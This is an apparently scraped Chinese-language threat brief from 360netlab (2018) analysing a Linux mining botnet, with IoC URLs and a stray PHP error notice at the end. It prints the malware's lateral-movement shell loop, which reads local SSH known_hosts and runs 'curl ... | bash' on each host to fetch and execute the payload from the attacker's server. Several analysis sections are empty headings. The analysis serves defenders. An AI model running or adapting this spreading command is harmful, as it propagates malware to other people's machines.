威胁快讯:一次僵尸挖矿威胁分析 | xxx威胁快讯:一次僵尸挖矿威胁分析 – xxx
菜单

威胁快讯:一次僵尸挖矿威胁分析

六月 26, 2018 - 360netlab

友商发布了一个威胁分析 报告,我们阐述一下从我们的角度看到的情况。

核心样本

hxxp://120.55.54.65/a7   

核心样本是个 Linux Shell 文件,后续动作均由该样本完成,包括:

挖矿获利

具体的挖矿动作是由下面一组样本完成的:

样本中的挖矿配置如下:

查矿池给付记录可知:

确保资源

核心模块中为了确保挖矿资源,采取了若干对抗动作,包括:

逃避检测

核心模块采取了若干动作对抗检测,包括:

横向扩展

检查本地 ssh 凭证,尝试进一步横向扩展,继续投递核心模块 a7

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then     for h in $(grep -oE "/b([0-9]{1,3}/.){3}[0-9]{1,3}/b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-  hxxp://120.55.54.65/a7 | bash >/dev/null 2>&1 &' & done fi   

IoC

主要模块

hxxp://120.55.54.65/a7     AS37963 Hangzhou Alibaba Advertising Co.,Ltd.   

挖矿程序

hxxps://www.aybc.so/ubuntu.tar.gz   hxxps://www.aybc.so/debian.tar.gz   hxxps://www.aybc.so/cent.tar.gz   

Notice: Undefined variable: canUpdate in /var/www/html/wordpress/wp-content/plugins/wp-autopost-pro/wp-autopost-function.php on line 51